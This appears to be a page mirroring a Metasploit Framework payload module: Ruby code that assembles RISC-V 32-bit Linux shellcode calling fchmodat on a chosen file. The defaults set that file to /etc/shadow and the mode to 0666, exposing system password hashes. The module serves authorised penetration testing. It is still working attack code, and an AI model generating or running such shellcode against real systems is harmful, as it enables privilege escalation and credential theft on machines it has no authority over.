Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/linux/riscv32le/chmod.rb
27932 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = 52

8


9
  include Msf::Payload::Single

10


11
  def initialize(info = {})

12
    super(

13
      merge_info(

14
        info,

15
        'Name' => 'Linux Chmod',

16
        'Description' => 'Runs chmod on the specified file with specified mode.',

17
        'Author' => 'bcoles',

18
        'License' => MSF_LICENSE,

19
        'Platform' => 'linux',

20
        'Arch' => ARCH_RISCV32LE,

21
        'References' => [

22
          ['URL', 'https://man7.org/linux/man-pages/man2/fchmodat.2.html'],

23
          ['URL', 'https://github.com/bcoles/shellcode/blob/main/riscv32/chmod/chmod.s'],

24
        ]

25
      )

26
    )

27
    register_options([

28
      OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),

29
      OptString.new('MODE', [ true, 'File mode (octal)', '0666' ]),

30
    ])

31
  end

32


33
  # @return [String] the full path of the file to be modified

34
  def chmod_file_path

35
    datastore['FILE'] || ''

36
  end

37


38
  # @return [Integer] the desired mode for the file

39
  def mode

40
    (datastore['MODE'] || '0666').oct

41
  rescue StandardError => e

42
    raise ArgumentError, "Invalid chmod mode '#{datastore['MODE']}': #{e.message}"

43
  end

44


45
  # @return [Integer] RISC-V instruction to load mode into a2 register

46
  # For example: 0x1ad00613 ; li a2,429 ; loads 429 (0o644) into a2

47
  def chmod_instruction(mode)

48
    (mode & 0xfff) << 20 | 0x0613

49
  end

50


51
  def generate(_opts = {})

52
    raise ArgumentError, "chmod mode (#{mode}) is greater than maximum mode size (0x7FF)" if mode > 0x7FF

53


54
    shellcode = [

55
      0xf9c00513,  # li a0,-100

56
      0x00000597,  # auipc a1,0x0

57
      0x02458593,  # addi a1,a1,36 # 100a0 <path>

58
      chmod_instruction(mode), # li a2,<mode>

59
      0x00000693,  # li a3,0

60
      0x03500893,  # li a7,53 # __NR_fchmodat

61
      0x00000073,  # ecall

62
      0x00000513,  # li a0,0

63
      0x05d00893,  # li a7,93 # __NR_exit

64
      0x00000073,  # ecall

65
    ].pack('V*')

66
    shellcode += chmod_file_path + "\x00"

67


68
    # align our shellcode to 4 bytes

69
    shellcode += "\x00" while shellcode.bytesize % 4 != 0

70


71
    super.to_s + shellcode

72
  end

73
end

74


75